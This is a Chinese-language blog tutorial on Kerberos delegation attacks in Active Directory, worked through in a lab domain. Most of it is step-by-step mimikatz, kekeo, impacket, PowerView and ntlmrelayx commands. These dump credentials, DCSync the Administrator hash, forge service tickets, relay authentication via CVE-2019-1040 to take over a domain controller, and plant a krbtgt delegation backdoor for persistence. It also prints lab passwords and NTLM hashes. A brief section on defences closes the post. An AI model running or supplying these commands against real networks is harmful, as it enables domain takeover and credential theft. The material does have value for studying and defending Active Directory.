域渗透之委派攻击全集

域渗透之委派攻击全集

域委派是什么

是将域用户的权限委派给服务账号,委派之后,服务账号就可以以域用户的身份去做域用户能够做的事

注意:能够被委派的用户只能是服务账号或者机器账号

1.机器账户:活动目录中的computers组内的计算机,也被称为机器账号。

image-20220716134445155

2、服务账号:域内用户的一种类型,是服务器运行服务时所用的账号,将服务运行起来加入域内,比如:SQLServer,MYSQL等,还有就是域用户通过注册SPN也能成为服务账号。

服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。就比如 SQL Server在安装时,会在域内自动注册服务账号SqlServiceAccount,这类账号不能用于交互式登录。

委派的分类

  • 非约束委派(Unconstrained Delegation, UD)
  • 约束委派(Constrained Delegation, CD)
  • 基于资源的约束委派(Resource Based Constrained Delegation, RBCD)

非约束委派

通俗来讲就是 :

在域中如果出现A使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派

一个经典例子:参考Y4er

image-20220716140108243

jack需要登陆到后台文件服务器,经过Kerberos认证的过程如下:

  1. jack以Kerberos协议认证登录,将凭证发送给websvc
  2. websvc使用jack的凭证向KDC发起Kerberos申请TGT。
  3. KDC检查websvc的委派属性,如果websvc可以委派,则返回可转发的jack的TGT。
  4. websvc收到可转发TGT之后,使用该TGT向KDC申请可以访问后台文件服务器的TGS票据。
  5. KDC检查websvc的委派属性,如果可以委派,并且权限允许,那么返回jack访问服务的TGS票据。
  6. websvc使用jack的服务TGS票据请求后台文件服务器。

这里就相当于说 jack 登录到web服务器后 访问后台文件服务器 是没有权限的 后台服务器以为是websvc在访问它,但如果websvc设置了委派 就可以以jack的身份去访问后台这样 就有权限访问 这个时候websvc也可以使用jack的身份访问其他jack有权限访问的服务

实验环境

WIN2016 域控 hostname:DC ip:10.150.127.166

win2016 域机器 hostname:WEB ip:10.150.127.168

域用户 many asd123!

设置非约束性委派

机器账户的非约束性委派设置

image-20220716143132377

服务账户的非约束委派设置

many是普通域用户 默认是没有委派设置的

image-20220716143223653

给域用户注册SPN

命令

setspn -U -A priv/test many

在域控上执行

image-20220716143435176

然后查看many用户

image-20220716143501835

已经有了委派属性然后设置为非约束委派

查询域内设置了非约束委派的服务账户

在WEB上执行

命令:

1
AdFind.exe -b "DC=haishi,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

image-20220716144035129

查询域内设置了非约束委派的机器账户

命令:

1
AdFind.exe -b "DC=haishi,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

image-20220716144219539

域内域控机器账户默认设置了非约束委派

利用方式1

使域管理员访问被控机器

找到配置了非约束委派的机器(机器账户) 并且获取了其管理员权限

这里利用WEB演示

直接用administrator登录

把mimikatz传上去

先查看本地票据

命令:

1
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

image-20220716152134623

image-20220716152145023

使用域控访问WEB

在域控上执行

命令:

1
net use \\web.haishi.com

image-20220716152319242

然后回到WEB 重新导出票据

image-20220716152422540

有admin的

拒绝访问

image-20220716152507132

导入票据

1
mimikatz.exe "kerberos::ptt [0;36eb98]-2-0-60a10000-Administrator@krbtgt-HAISHI.COM.kirbi" "exit"

image-20220716152646324

在次访问

image-20220716152708763

成功访问到

清除缓存

image-20220716154003304

image-20220716154035931

image-20220716154044960

利用方式2

利用打印机漏洞

强迫运行打印服务(Print Spooler)的主机向目标主机发起 Kerberos 或 NTLM 认证请求。

条件

administrator权限

域用户的账户密码

域控开启打印机

image-20220716161434151

工具

https://github.com/leechristensen/SpoolSample/ 自己编译

image-20220716163602719

mimikatz

需要使用域用户运行SpoolSample

runas /user:haishi.com\many powershell 打开一个域用户权限的powershell

image-20220716163911504

然后在many的powershell运行

image-20220716164314498

然后导出票据

image-20220716164339749

然后和上面一样 导入票据

命令

1
mimikatz.exe "kerberos::ptt [0;af1f8]-0-0-60a50000-DC$@cifs-dc.haishi.com.kirbi" "exit"

image-20220716164519440

然后导出hash

1
lsadump::dcsync /domain:haishi.com /user:haishi\Administrator

image-20220716171913849

然后利用wmiexec.py远程登录

1
python3 wmiexec.py -hashes :fb4f3a0d0b8c4d81d72d36b925dbed6c haishi.com/administrator@10.150.127.166 -no-pass

image-20220716172404300

这里用的工具包impacket(github自行下载)

然后清除票据

但其实在实战中 很少遇到这种情况

约束性委派

由于非约束委派的不安全性,微软在windows2003中发布了约束委派的功能,如下所示

在约束委派中的kerberos中,用户同样还是会将TGT发送给相关受委派的服务,但是由于S4U2proxy的影响,对发送给受委派的服务去访问其他服务做了限制,不允许受委派的服务代表用户使用这个TGT去访问任意服务,而是只能访问指定的服务。

引入了两个新的概念

S4U2Self和S4U2Proxy

S4U2self

允许受约束委派的服务代表任意用户向KDC请求服务自身,从而获得一张该用户(任意用户)的对当前受约束委派服务的票据TGS(ST),该服务票据TGS(ST)包含了用户的相关信息,比如该用户的组信息等。

S4U2proxy

允许受约束委派的服务通过服务票据ST,然后代表用户去请求指定的服务。

大概过程:

image-20220716173258442

具体的原理介绍就不详细说明了 可自行百度

直接实验

配置约束性委派

机器账户

这里配置一个能进行协议转换的

image-20220716231908537

服务账户

image-20220716232052413

因为上面注册了SPN 这里就不注册了 直接使用

查询机器用户(主机)配置约束委派

1
2
AdFind.exe -b "DC=haishi,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

image-20220716233526410

查询服务账户

1
AdFind.exe -b "DC=haishi,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

image-20220716233642158

利用方式1

使用机器账户WEB

条件

administrator权限

获取配置了约束委派的服务账户或者机器账户的凭据 明文密码 hash都可

先拿到WEB的票据

1
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

image-20220716235141349

使用kekeo申请服务票据

1
kekeo.exe "tgs::s4u /tgt:[0;3e7]-2-2-40e10000-WEB$@krbtgt-HAISHI.COM.kirbi /user:Administrator@haishi.com /service:cifs/DC.haishi.com" "exit"

image-20220716235823260

现在无法访问

image-20220716235739329

导入票据

1
mimikatz.exe "kerberos::ptt TGS_Administrator@haishi.com@HAISHI.COM_cifs~DC.haishi.com@HAISHI.COM.kirbi" "exit"

image-20220716235954431

导入之后 就能访问了

利用方式2

使用机器账户的hash

先获取机器账户的hash

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

image-20220717000426384

请求票据

1
kekeo.exe "tgt::ask /user:WEB$ /domain:haishi.com /NTLM:48b1ee6132349190ee7c47d4b5d91608" "exit"

image-20220717000740190

1
2
# 申请administrator权限的票据
kekeo.exe "tgs::s4u /tgt:TGT_WEB$@HAISHI.COM_krbtgt~haishi.com@HAISHI.COM.kirbi /user:Administrator@haishi.com /service:cifs/DC.haishi.com" "exit"

image-20220717000905096

因为名字一样 把刚才的覆盖了

image-20220717001004243

然后导入票据

1
mimikatz.exe "kerberos::ptt TGS_Administrator@haishi.com@HAISHI.COM_cifs~DC.haishi.com@HAISHI.COM.kirbi" "exit"

访问

1
2
# 访问
dir \\DC.haishi.com\c$

利用方式3

用机器账户的hash 远程wmiexec登录

利用之前获取到的hash

48b1ee6132349190ee7c47d4b5d91608

用getST申请服务票据

1
python3 getST.py -dc-ip 10.150.127.166 -spn CIFS/DC.haishi.com -impersonate administrator haishi.com/WEB$ -hashes :48b1ee6132349190ee7c47d4b5d91608

然后导入票据

1
export KRB5CCNAME=administrator.ccache
1
python3 wmiexec.py -k haishi.com/administrator@DC.haishi.com -no-pass -dc-ip 10.150.127.166

这里有个小tips

需要将域名加入到hosts

image-20220717003235441

不然会报错

image-20220717003251776

以后遇到这种错误就可能是没有将域名加入到hosts

加入之后

image-20220717003303962

利用方式4

使用服务账户many

这里直接用密码

先申请tgt

1
kekeo.exe "tgt::ask /user:many /domain:haishi.com /password:asd123! /ticket:many.kirbi" "exit"

image-20220717004114656

然后伪造其他用户 申请tgs票据

1
kekeo.exe "Tgs::s4u /tgt:TGT_many@HAISHI.COM_krbtgt~haishi.com@HAISHI.COM.kirbi /user:administrator@haishi.com /service:cifs/DC.haishi.com" "exit"

image-20220717004412244

image-20220717004437782

导入票据

1
mimikatz.exe "kerberos::ptt TGS_Administrator@haishi.com@HAISHI.COM_cifs~DC.haishi.com@HAISHI.COM.kirbi" "exit"

image-20220717004544728

然后访问

1
dir \\dc.haishi.com\c$

image-20220717004610459

获取到服务账户的hash

操作同前面类似 就不做演示了

但在实战中 约束性委派也遇到的很少

基于资源的约束性委派

为了使用户/资源更加独立,Windows Server 2012中引入了基于资源的约束委派。基于资源的约束委派允许资源配置受信任的帐户委派给他们。基于资源的约束委派将委派的控制权交给拥有被访问资源的管理员。

上面”基于资源的约束委派将委派的控制权交给拥有被访问资源的管理员”,这就导致了正常只要是域用户都有权限进行委派操作。

与约束委派最大的不同点,就是”基于资源”这四个字,如何理解”基于资源”?在设置相关的约束委派的实现的时候不再需要域管理员自己去设置相关约束委派的属性,而操作权落在了当前登录的机器或者用户的手中

基于资源的约束性委派的优势

  • 委派的权限授予给了拥有资源的后端,而不再是前端
  • 约束性委派不能跨域进行委派,基于资源的约束性委派可以跨域和林
  • 不再需要域管理员权限设置委派,只需拥有在计算机对象上编辑msDS-AllowedToActOnBehaffOtherldentity属性权限也就是将计算机加入域的域用户和机器自身拥有权限。

约束性委派和基于资源的约束性委派配置的差别

  • 传统的约束委派是正向的,通过修改服务A的属性msDS-AlowedToDelegateTo,添加服务B的SPN,设置约束委派对象(服务B),服务A便可以模拟用户向域控制器请求访问服务B的ST服务票据。

  • 而基于资源的约束委派则是相反的,通过修改服务B属性msDS-AllowedToActOnBehalfOfotherldentity,添加服务A的SID,达到让服务A模拟用户访问B资源的目的。

  • msDS-AllowedToActOnBehalfOfOtherIdentity属性指向委派账户(也就是我们创建的机器账户或已知机器账户)

条件

  1. 具有对主机修改msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限(如已经控制的主机是WEB 则具有修改WEB主机的msDS-AllowedToActOnBehalfOfOtherIdentity的权限账户)

  2. 可以创建机器账户的域用户(或已知机器账户)

    什么用户能够修改msDS-AllowedToActOnBehalfOfOtherIdentity属性:

    • 将主机加入域的用户(账户中有一个mSDS-CreatorSID属性,用于标记加入域时使用的用户的SID值,反查就可以知道是谁把机器加入域的了)
    • Account Operator组成员
    • 该主机的机器账户

    什么是将机器加入域的域用户?

    因为将一个机器加入域的时候不是要输入一个域用户的账户密码吗 就是输入的这个用户

    如果一个域环境 域用户A 将域内win2012 和 win7 加入了域 我们拿到了域用户A的权限 就可以拿下win2012 和 win7

    如果我们拿到了Account Operators组内用户权限的话,则我们可以拿到除域控外所有机器的system权限。(因为Account Operators组内用户可以修改域内任意主机(除了域控)的msDS-AllowedToActOnBehalfOfOtherIdentity属性)

    这里我为了实验因为刚开始没有用many加入域 用的是域控 就重新设置一下机器 先脱域 然后重新加入

    image-20220717111530802

    然后委派这些也都删除

    image-20220717110723921

    查询把WEB加入域的用户

image-20220717113411112

1
AdFind.exe -h 10.150.127.166 -b "DC=haishi,DC=com" -f "objectClass=computer" mS-DS-CreatorSID

当前登录的是域用户many ip是域控的166

这里可以看到一个sid:S-1-5-21-1400638014-602433399-2258725660-1146

image-20220717120028256

1
sid2user.exe \\10.150.127.166 5 21 1400638014 602433399 2258725660 1146

可以看到 用户是many

WEB是被many加入域的

利用方式1:基于资源的约束委派攻击本地提权

实验环境中 如果获取到了many的权限 就可以用这个用户的权限进行本地提权了

  • 利用many域用户创建一个机器账户(每个域用户默认可以创建10个)
  • 然后修改WEB的msDS-AllowedToActOnBehalfOfOtherIdentity 为新创建的机器用户的sid
  • 然后利用机器账户申请票据 进行提权

创建机器用户

利用Powermad.ps1

创建一个test1机器用户 密码123456

1
2
3
4
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

image-20220717122234689

image-20220717122340272

这里需要注意 如果powershell设置了约束模式 则需要 bypass才能导入 这些powershell脚本

机器账户创建之后

利用powerView查询机器账户的sid(也可手动)

1
Get-NetComputer test1 -Properties objectsid

image-20220717122842774

test1 sid:S-1-5-21-1400638014-602433399-2258725660-1148

设置委派 修改WEB的msds-allowedtoactonbehalfofotheridentity的值

利用powerView

1
2
3
4
5
6
7
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1400638014-602433399-2258725660-1148)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer WEB| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

查询是否修改成功

1
Get-DomainComputer WEB -Properties msds-allowedtoactonbehalfofotheridentity

image-20220717123257816

清除 msds-allowedtoactonbehalfofotheridentity 属性的值

1
Set-DomainObject WEB -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

然后生成票据

1
python3 getST.py -dc-ip 10.150.127.166 haishi.com/test1\$:123456 -spn cifs/WEB.haishi.com -impersonate administrator

image-20220717123909323

导入票据

1
2
3
export KRB5CCNAME=administrator.ccache   

python3 wmiexec.py WEB.haishi.com -no-pass -k -dc-ip 10.150.127.166

image-20220717124122344

这里还是需要将域名加入到hosts

psexec上去权限更高

1
python3 psexec.py -k haishi.com/administrator@WEB.haishi.com -no-pass 

image-20220717124453779

利用方式2 Acount Operators组用户拿下主机

如果获得Acount Operators组用户就可以获得域内除了域控的所有主机权限

Acount Operators组成员可以修改域内除了域控其他所有主机的msDS-AllowedToActOnBehalfOfOtherIdentity属性

这里本地设置一个Acount Operators组用户

image-20220717152244135

就还是用many 加入进去

查询Acount Operators组成员

1
adfind.exe -h 10.150.127.166:389 -s subtree -b CN="Account Operators",CN=Builtin,DC=haishi,DC=com member

image-20220717152526788

操作一样

先创建机器账户

1
2
3
4
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount test3 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

image-20220717152652825

然后设置委派

先查sid

1
Get-NetComputer test1 -Properties objectsid

test3 sid:S-1-5-21-1400638014-602433399-2258725660-1152

image-20220717153339015

修改WEB的msds-allowedtoactonbehalfofotheridentity的值

1
2
3
4
5
6
7
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1400638014-602433399-2258725660-1152)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer WEB| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

image-20220717153545535

然后生成票据

1
python3 getST.py -dc-ip 10.150.127.166 haishi.com/test3\$:123456 -spn cifs/WEB.haishi.com -impersonate administrator

image-20220717153805714

导入票据

1
2
3
export KRB5CCNAME=administrator.ccache   

python3 wmiexec.py WEB.haishi.com -no-pass -k -dc-ip 10.150.127.166

image-20220717153856235

利用方式3:结合HTLM Relay接管域控(CVE-2019-1040)

辅助域控 win2016

DC2 10.150.127.186

还是先在WEB上创建一个机器用户 test2 123456

1
2
3
4
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount test2 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

image-20220717141655312

image-20220717141724077

然后开启监听

1
python3 ntlmrelayx.py -t ldap://10.150.127.166 -smb2support --remove-mic --delegate-access --escalate-user test2\$

image-20220717145052587

然后利用打印机漏洞

1
python3 printerbug.py haishi.com/many:asd123\!\@10.150.127.186 10.150.127.128

image-20220717150018475

然后申请票据

1
python3 getST.py haishi.com/test2\$:123456 -spn CIFS/DC2.haishi.com -impersonate Administrator -dc-ip 10.150.127.166

image-20220717150526185

导入

image-20220717150537045

成功接管域控

ntlm-relay攻击的前提是,smb认证获取的机器没有开启smb签名

cve-2019-1040 在这里的作用是绕过了mic检验 因为打印机触发的是smb协议 域控是默认带有smb签名的 而cve漏洞在这里就刚好绕过了mic的检验 然后完成了ntlm-relay攻击

利用方式4 打造变种黄金票据

在获得域控的权限后 对krbtgt用户设置委派属性 来打造黄金票据 进行权限维持

先创建一个机器账户 test4 123456

image-20220717154325793

然后来到域控上操作

在powershell中执行

1
2
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount test4$
Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

image-20220717154833585

已经成功配置基于资源的约束委派

现在不管krbtgt的密码 hash怎么变 都不会影响我们打造黄金票据

申请票据

1
python3 getST.py haishi.com/test4\$:123456 -spn krbtgt -impersonate administrator -dc-ip 10.150.127.166

image-20220717155119911

导入票据

1
2
3
export KRB5CCNAME=administrator.ccache

python3 smbexec.py -k administrator@DC.haishi.com -no-pass -dc-ip 10.150.127.166

image-20220717155559117

域委派防范措施

高权限用户,设置为敏感用户,不能被委派

image-20220717155950019

主机账号需设置委派时,只能设置为约束性委派;

Windows 2012 R2及更高的系统建立了受保护的用户组Protected Users,组内用户不允许被委派,这是有效的手段。受保护的用户组,

image-20220717160102932

但有一个cve可绕过这些限制CVE-2020-1704

绕过原理就不细讲了 参考CVE-2020-17049

稳的防范 就打补丁打补丁 KB4598347

所用工具

链接:https://pan.baidu.com/s/1TEtjj8hf-pmp9ZsJqikFKQ
提取码:k0pd

参考:https://www.bilibili.com/video/BV1564y1Y7HF?spm_id_from=333.999.0.0&vd_source=17131ae497e9fc1fdcbad3da526ab8a6

https://blog.csdn.net/qq_41874930/article/details/108825010

https://blog.csdn.net/nicai321/article/details/122679357

https://blog.csdn.net/qq_44159028/article/details/124118253


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!